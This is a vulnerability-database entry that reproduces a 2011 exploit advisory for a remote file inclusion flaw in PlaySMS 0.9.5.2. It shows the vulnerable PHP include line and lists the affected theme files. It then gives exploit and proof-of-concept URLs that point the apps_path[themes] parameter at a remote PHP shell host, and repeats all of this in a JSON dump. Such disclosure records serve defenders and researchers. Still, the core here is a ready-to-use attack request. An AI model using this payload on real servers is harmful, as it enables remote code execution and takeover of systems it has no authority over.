Search...

PlaySMS <= 0.9.5.2 - Remote File Inclusion Vulnerability

2014-07-01T00:00:00

ID SSV:72071
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00

Description

No description provided by source.

                                        
                                            
                                                =============================================================================================================
 
  [o] PlaySMS &#60;= Remote File Inclusion Vulnerability
  
       Software : PlaySMS ver 0.9.5.2
       Vendor   : http://playsms.org/
       Author   : NoGe
       Contact  : noge[dot]code[at]gmail[dot]com
       Blog     : http://evilc0de.blogspot.com/

=============================================================================================================

  [o] Vulnerability

       &#60;?php include $apps_path[&#39;themes&#39;].&#34;/&#34;.$themes_module.&#34;/header.php&#34;; ?&#62;

       affected all this files

       web/plugin/themes/default/page_forgot.php
       web/plugin/themes/default/page_login.php
       web/plugin/themes/default/page_noaccess.php
       web/plugin/themes/default/page_register.php
       web/plugin/themes/km2/page_noaccess.php
       web/plugin/themes/work2/page_forgot.php
       web/plugin/themes/work2/page_login.php
       web/plugin/themes/work2/page_noaccess.php
       web/plugin/themes/work2/page_register.php


  [o] Exploit

       http://localhost/[path]/web/plugin/themes/default/page_forgot.php?apps_path[themes]=[RFI]


  [o] PoC

       http://localhost/[path]/web/plugin/themes/default/page_forgot.php?apps_path[themes]=http://phpshell?

=============================================================================================================

  [o] Greetz

       Vrs-hCk OoN_BoY Paman zxvf s4va Angela Zhang stardustmemory
       aJe kaka11 matthews wishnusakti inc0mp13te martfella
       pizzyroot Genex H312Y noname tukulesto }^-^{

=============================================================================================================

  [o] September 05 2011 - Papua, Indonesia

JSON Vulners Source

Initial Source

{"href": "https://www.seebug.org/vuldb/ssvid-72071", "status": "poc", "bulletinFamily": "exploit", "modified": "2014-07-01T00:00:00", "title": "PlaySMS <= 0.9.5.2 - Remote File Inclusion Vulnerability", "cvss": {"vector": "NONE", "score": 0.0}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-72071", "cvelist": [], "description": "No description provided by source.", "viewCount": 4, "published": "2014-07-01T00:00:00", "sourceData": "\n =============================================================================================================\r\n \r\n [o] PlaySMS <= Remote File Inclusion Vulnerability\r\n \r\n Software : PlaySMS ver 0.9.5.2\r\n Vendor : http://playsms.org/\r\n Author : NoGe\r\n Contact : noge[dot]code[at]gmail[dot]com\r\n Blog : http://evilc0de.blogspot.com/\r\n\r\n=============================================================================================================\r\n\r\n [o] Vulnerability\r\n\r\n <?php include $apps_path['themes']."/".$themes_module."/header.php"; ?>\r\n\r\n affected all this files\r\n\r\n web/plugin/themes/default/page_forgot.php\r\n web/plugin/themes/default/page_login.php\r\n web/plugin/themes/default/page_noaccess.php\r\n web/plugin/themes/default/page_register.php\r\n web/plugin/themes/km2/page_noaccess.php\r\n web/plugin/themes/work2/page_forgot.php\r\n web/plugin/themes/work2/page_login.php\r\n web/plugin/themes/work2/page_noaccess.php\r\n web/plugin/themes/work2/page_register.php\r\n\r\n\r\n [o] Exploit\r\n\r\n http://localhost/[path]/web/plugin/themes/default/page_forgot.php?apps_path[themes]=[RFI]\r\n\r\n\r\n [o] PoC\r\n\r\n http://localhost/[path]/web/plugin/themes/default/page_forgot.php?apps_path[themes]=http://phpshell?\r\n\r\n=============================================================================================================\r\n\r\n [o] Greetz\r\n\r\n Vrs-hCk OoN_BoY Paman zxvf s4va Angela Zhang stardustmemory\r\n aJe kaka11 matthews wishnusakti inc0mp13te martfella\r\n pizzyroot Genex H312Y noname tukulesto }^-^{\r\n\r\n=============================================================================================================\r\n\r\n [o] September 05 2011 - Papua, Indonesia\r\n\r\n\n ", "id": "SSV:72071", "enchantments_done": [], "type": "seebug", "lastseen": "2017-11-19T15:33:31", "reporter": "Root", "enchantments": {"score": {"value": -0.0, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.0}, "references": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645262702}}

PlaySMS &lt;= 0.9.5.2 - Remote File Inclusion Vulnerability

Description

No description provided by source.

PlaySMS <= 0.9.5.2 - Remote File Inclusion Vulnerability